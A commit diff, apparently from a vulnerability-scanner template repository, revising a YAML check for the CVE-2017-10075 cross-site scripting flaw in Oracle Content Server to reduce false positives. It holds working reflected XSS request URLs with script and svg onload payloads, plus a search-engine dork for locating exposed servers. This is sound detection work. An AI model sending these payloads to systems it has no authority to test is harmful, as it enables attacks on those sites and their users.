Fix FP CVE-2017-10075

cves/2017/CVE-2017-10075.yaml

@@ -1,34 +1,47 @@
 id: CVE-2017-10075
 
 info:
-  name: Oracle Content Server Cross-Site Scripting
+  name: Oracle Content Server - Cross-Site Scripting
   author: madrobot
   severity: high
-  description: Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
+  description: |
+    Oracle Content Server version 11.1.1.9.0, 12.2.1.1.0 and 12.2.1.2.0 are susceptible to cross-site scripting. The vulnerability can be used to include HTML or JavaScript code in the affected web page. The code is executed in the browser of users if they visit the manipulated site.
   reference:
     - http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2017-10075
     - http://web.archive.org/web/20211206074610/https://securitytracker.com/id/1038940
+    - https://nvd.nist.gov/vuln/detail/CVE-2017-10075
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
     cvss-score: 8.2
     cve-id: CVE-2017-10075
+  metadata:
+    verified: true
+    google-dork: inurl:"/cs/idcplg"
   tags: cve,cve2017,xss,oracle
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
-      - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
+      - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO"
+      - "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
+      - type: word
+        part: body
+        words:
+          - "<svg/onload=alert(document.domain)>"
+          - "ORACLE_QUERY"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
       - type: status
         status:
           - 200
-      - type: word
-        words:
-          - "<script>alert(31337)</script>"
-        part: body
 
 # Enhanced by mp on 2022/04/12